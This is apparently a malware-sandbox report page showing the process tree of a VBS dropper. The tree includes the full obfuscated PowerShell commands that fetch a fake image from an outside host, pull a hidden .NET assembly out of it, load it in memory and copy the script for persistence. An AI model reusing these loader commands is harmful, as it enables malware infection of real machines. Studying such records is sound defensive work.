| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLIEbrowserhistory.vbs
660
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDWKuQemdUcKBpDWKuQemdUcKG0DWKuQemdUcKYQBnDWKuQemdUcKGUDWKuQemdUcKVQByDWKuQemdUcKGwDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcK9DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKJwBoDWKuQemdUcKHQDWKuQemdUcKdDWKuQemdUcKBwDWKuQemdUcKHMDWKuQemdUcKOgDWKuQemdUcKvDWKuQemdUcKC8DWKuQemdUcKdQBwDWKuQemdUcKGwDWKuQemdUcKbwBhDWKuQemdUcKGQDWKuQemdUcKZDWKuQemdUcKBlDWKuQemdUcKGkDWKuQemdUcKbQBhDWKuQemdUcKGcDWKuQemdUcKZQBuDWKuQemdUcKHMDWKuQemdUcKLgBjDWKuQemdUcKG8DWKuQemdUcKbQDWKuQemdUcKuDWKuQemdUcKGIDWKuQemdUcKcgDWKuQemdUcKvDWKuQemdUcKGkDWKuQemdUcKbQBhDWKuQemdUcKGcDWKuQemdUcKZQBzDWKuQemdUcKC8DWKuQemdUcKMDWKuQemdUcKDWKuQemdUcKwDWKuQemdUcKDQDWKuQemdUcKLwDWKuQemdUcK2DWKuQemdUcKDMDWKuQemdUcKNDWKuQemdUcKDWKuQemdUcKvDWKuQemdUcKDYDWKuQemdUcKNwDWKuQemdUcK2DWKuQemdUcKC8DWKuQemdUcKbwByDWKuQemdUcKGkDWKuQemdUcKZwBpDWKuQemdUcKG4DWKuQemdUcKYQBsDWKuQemdUcKC8DWKuQemdUcKcgB1DWKuQemdUcKG0DWKuQemdUcKcDWKuQemdUcKBlDWKuQemdUcKC4DWKuQemdUcKagBwDWKuQemdUcKGcDWKuQemdUcKPwDWKuQemdUcKxDWKuQemdUcKDYDWKuQemdUcKOQDWKuQemdUcK3DWKuQemdUcKDDWKuQemdUcKDWKuQemdUcKNQDWKuQemdUcKzDWKuQemdUcKDUDWKuQemdUcKMgDWKuQemdUcK5DWKuQemdUcKCcDWKuQemdUcKOwDWKuQemdUcKkDWKuQemdUcKHcDWKuQemdUcKZQBiDWKuQemdUcKEMDWKuQemdUcKbDWKuQemdUcKBpDWKuQemdUcKGUDWKuQemdUcKbgB0DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKPQDWKuQemdUcKgDWKuQemdUcKE4DWKuQemdUcKZQB3DWKuQemdUcKC0DWKuQemdUcKTwBiDWKuQemdUcKGoDWKuQemdUcKZQBjDWKuQemdUcKHQDWKuQemdUcKIDWKuQemdUcKBTDWKuQemdUcKHkDWKuQemdUcKcwB0DWKuQemdUcKGUDWKuQemdUcKbQDWKuQemdUcKuDWKuQemdUcKE4DWKuQemdUcKZQB0DWKuQemdUcKC4DWKuQemdUcKVwBlDWKuQemdUcKGIDWKuQemdUcKQwBsDWKuQemdUcKGkDWKuQemdUcKZQBuDWKuQemdUcKHQDWKuQemdUcKOwDWKuQemdUcKkDWKuQemdUcKGkDWKuQemdUcKbQBhDWKuQemdUcKGcDWKuQemdUcKZQBCDWKuQemdUcKHkDWKuQemdUcKdDWKuQemdUcKBlDWKuQemdUcKHMDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcK9DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKJDWKuQemdUcKB3DWKuQemdUcKGUDWKuQemdUcKYgBDDWKuQemdUcKGwDWKuQemdUcKaQBlDWKuQemdUcKG4DWKuQemdUcKdDWKuQemdUcKDWKuQemdUcKuDWKuQemdUcKEQDWKuQemdUcKbwB3DWKuQemdUcKG4DWKuQemdUcKbDWKuQemdUcKBvDWKuQemdUcKGEDWKuQemdUcKZDWKuQemdUcKBEDWKuQemdUcKGEDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKCgDWKuQemdUcKJDWKuQemdUcKBpDWKuQemdUcKG0DWKuQemdUcKYQBnDWKuQemdUcKGUDWKuQemdUcKVQByDWKuQemdUcKGwDWKuQemdUcKKQDWKuQemdUcK7DWKuQemdUcKCQDWKuQemdUcKaQBtDWKuQemdUcKGEDWKuQemdUcKZwBlDWKuQemdUcKFQDWKuQemdUcKZQB4DWKuQemdUcKHQDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcK9DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKWwBTDWKuQemdUcKHkDWKuQemdUcKcwB0DWKuQemdUcKGUDWKuQemdUcKbQDWKuQemdUcKuDWKuQemdUcKFQDWKuQemdUcKZQB4DWKuQemdUcKHQDWKuQemdUcKLgBFDWKuQemdUcKG4DWKuQemdUcKYwBvDWKuQemdUcKGQDWKuQemdUcKaQBuDWKuQemdUcKGcDWKuQemdUcKXQDWKuQemdUcK6DWKuQemdUcKDoDWKuQemdUcKVQBUDWKuQemdUcKEYDWKuQemdUcKODWKuQemdUcKDWKuQemdUcKuDWKuQemdUcKEcDWKuQemdUcKZQB0DWKuQemdUcKFMDWKuQemdUcKdDWKuQemdUcKByDWKuQemdUcKGkDWKuQemdUcKbgBnDWKuQemdUcKCgDWKuQemdUcKJDWKuQemdUcKBpDWKuQemdUcKG0DWKuQemdUcKYQBnDWKuQemdUcKGUDWKuQemdUcKQgB5DWKuQemdUcKHQDWKuQemdUcKZQBzDWKuQemdUcKCkDWKuQemdUcKOwDWKuQemdUcKkDWKuQemdUcKHMDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKHIDWKuQemdUcKdDWKuQemdUcKBGDWKuQemdUcKGwDWKuQemdUcKYQBnDWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKPQDWKuQemdUcKgDWKuQemdUcKCcDWKuQemdUcKPDWKuQemdUcKDWKuQemdUcK8DWKuQemdUcKEIDWKuQemdUcKQQBTDWKuQemdUcKEUDWKuQemdUcKNgDWKuQemdUcK0DWKuQemdUcKF8DWKuQemdUcKUwBUDWKuQemdUcKEEDWKuQemdUcKUgBUDWKuQemdUcKD4DWKuQemdUcKPgDWKuQemdUcKnDWKuQemdUcKDsDWKuQemdUcKJDWKuQemdUcKBlDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKBGDWKuQemdUcKGwDWKuQemdUcKYQBnDWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKPQDWKuQemdUcKgDWKuQemdUcKCcDWKuQemdUcKPDWKuQemdUcKDWKuQemdUcK8DWKuQemdUcKEIDWKuQemdUcKQQBTDWKuQemdUcKEUDWKuQemdUcKNgDWKuQemdUcK0DWKuQemdUcKF8DWKuQemdUcKRQBODWKuQemdUcKEQDWKuQemdUcKPgDWKuQemdUcK+DWKuQemdUcKCcDWKuQemdUcKOwDWKuQemdUcKkDWKuQemdUcKHMDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKHIDWKuQemdUcKdDWKuQemdUcKBJDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKBlDWKuQemdUcKHgDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcK9DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKJDWKuQemdUcKBpDWKuQemdUcKG0DWKuQemdUcKYQBnDWKuQemdUcKGUDWKuQemdUcKVDWKuQemdUcKBlDWKuQemdUcKHgDWKuQemdUcKdDWKuQemdUcKDWKuQemdUcKuDWKuQemdUcKEkDWKuQemdUcKbgBkDWKuQemdUcKGUDWKuQemdUcKeDWKuQemdUcKBPDWKuQemdUcKGYDWKuQemdUcKKDWKuQemdUcKDWKuQemdUcKkDWKuQemdUcKHMDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKHIDWKuQemdUcKdDWKuQemdUcKBGDWKuQemdUcKGwDWKuQemdUcKYQBnDWKuQemdUcKCkDWKuQemdUcKOwDWKuQemdUcKkDWKuQemdUcKGUDWKuQemdUcKbgBkDWKuQemdUcKEkDWKuQemdUcKbgBkDWKuQemdUcKGUDWKuQemdUcKeDWKuQemdUcKDWKuQemdUcKgDWKuQemdUcKD0DWKuQemdUcKIDWKuQemdUcKDWKuQemdUcKkDWKuQemdUcKGkDWKuQemdUcKbQBhDWKuQemdUcKGcDWKuQemdUcKZQBUDWKuQemdUcKGUDWKuQemdUcKeDWKuQemdUcKB0DWKuQemdUcKC4DWKuQemdUcKSQBuDWKuQemdUcKGQDWKuQemdUcKZQB4DWKuQemdUcKE8DWKuQemdUcKZgDWKuQemdUcKoDWKuQemdUcKCQDWKuQemdUcKZQBuDWKuQemdUcKGQDWKuQemdUcKRgBsDWKuQemdUcKGEDWKuQemdUcKZwDWKuQemdUcKpDWKuQemdUcKDsDWKuQemdUcKJDWKuQemdUcKBzDWKuQemdUcKHQDWKuQemdUcKYQByDWKuQemdUcKHQDWKuQemdUcKSQBuDWKuQemdUcKGQDWKuQemdUcKZQB4DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKLQBnDWKuQemdUcKGUDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcKwDWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKLQBhDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKDWKuQemdUcKgDWKuQemdUcKCQDWKuQemdUcKZQBuDWKuQemdUcKGQDWKuQemdUcKSQBuDWKuQemdUcKGQDWKuQemdUcKZQB4DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKLQBnDWKuQemdUcKHQDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcKkDWKuQemdUcKHMDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKHIDWKuQemdUcKdDWKuQemdUcKBJDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKBlDWKuQemdUcKHgDWKuQemdUcKOwDWKuQemdUcKkDWKuQemdUcKHMDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKHIDWKuQemdUcKdDWKuQemdUcKBJDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKBlDWKuQemdUcKHgDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcKrDWKuQemdUcKD0DWKuQemdUcKIDWKuQemdUcKDWKuQemdUcKkDWKuQemdUcKHMDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKHIDWKuQemdUcKdDWKuQemdUcKBGDWKuQemdUcKGwDWKuQemdUcKYQBnDWKuQemdUcKC4DWKuQemdUcKTDWKuQemdUcKBlDWKuQemdUcKG4DWKuQemdUcKZwB0DWKuQemdUcKGgDWKuQemdUcKOwDWKuQemdUcKkDWKuQemdUcKGIDWKuQemdUcKYQBzDWKuQemdUcKGUDWKuQemdUcKNgDWKuQemdUcK0DWKuQemdUcKEwDWKuQemdUcKZQBuDWKuQemdUcKGcDWKuQemdUcKdDWKuQemdUcKBoDWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKPQDWKuQemdUcKgDWKuQemdUcKCQDWKuQemdUcKZQBuDWKuQemdUcKGQDWKuQemdUcKSQBuDWKuQemdUcKGQDWKuQemdUcKZQB4DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKLQDWKuQemdUcKgDWKuQemdUcKCQDWKuQemdUcKcwB0DWKuQemdUcKGEDWKuQemdUcKcgB0DWKuQemdUcKEkDWKuQemdUcKbgBkDWKuQemdUcKGUDWKuQemdUcKeDWKuQemdUcKDWKuQemdUcK7DWKuQemdUcKCQDWKuQemdUcKYgBhDWKuQemdUcKHMDWKuQemdUcKZQDWKuQemdUcK2DWKuQemdUcKDQDWKuQemdUcKQwBvDWKuQemdUcKG0DWKuQemdUcKbQBhDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKDWKuQemdUcKgDWKuQemdUcKD0DWKuQemdUcKIDWKuQemdUcKDWKuQemdUcKkDWKuQemdUcKGkDWKuQemdUcKbQBhDWKuQemdUcKGcDWKuQemdUcKZQBUDWKuQemdUcKGUDWKuQemdUcKeDWKuQemdUcKB0DWKuQemdUcKC4DWKuQemdUcKUwB1DWKuQemdUcKGIDWKuQemdUcKcwB0DWKuQemdUcKHIDWKuQemdUcKaQBuDWKuQemdUcKGcDWKuQemdUcKKDWKuQemdUcKDWKuQemdUcKkDWKuQemdUcKHMDWKuQemdUcKdDWKuQemdUcKBhDWKuQemdUcKHIDWKuQemdUcKdDWKuQemdUcKBJDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKBlDWKuQemdUcKHgDWKuQemdUcKLDWKuQemdUcKDWKuQemdUcKgDWKuQemdUcKCQDWKuQemdUcKYgBhDWKuQemdUcKHMDWKuQemdUcKZQDWKuQemdUcK2DWKuQemdUcKDQDWKuQemdUcKTDWKuQemdUcKBlDWKuQemdUcKG4DWKuQemdUcKZwB0DWKuQemdUcKGgDWKuQemdUcKKQDWKuQemdUcK7DWKuQemdUcKCQDWKuQemdUcKYwBvDWKuQemdUcKG0DWKuQemdUcKbQBhDWKuQemdUcKG4DWKuQemdUcKZDWKuQemdUcKBCDWKuQemdUcKHkDWKuQemdUcKdDWKuQemdUcKBlDWKuQemdUcKHMDWKuQemdUcKIDWKuQemdUcKDWKuQemdUcK9DWKuQemdUcKCDWKuQemdUcKDWKuQemdUcKWwBTDWKuQemdUcKHkDWKuQemdUcKcwB0DWKuQemdUcKGUDWKuQemdUcKbQDWKuQemdUcKuDWKuQemdUcKEMDWKuQemdUcKbwBuDWKuQemdUcKHYDWKuQemdUcKZQByDWKuQe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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('DWKuQemdUcK','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  2144
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LldTRy8wODA5LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'hkcmd'))"
    2344
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
  2192

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents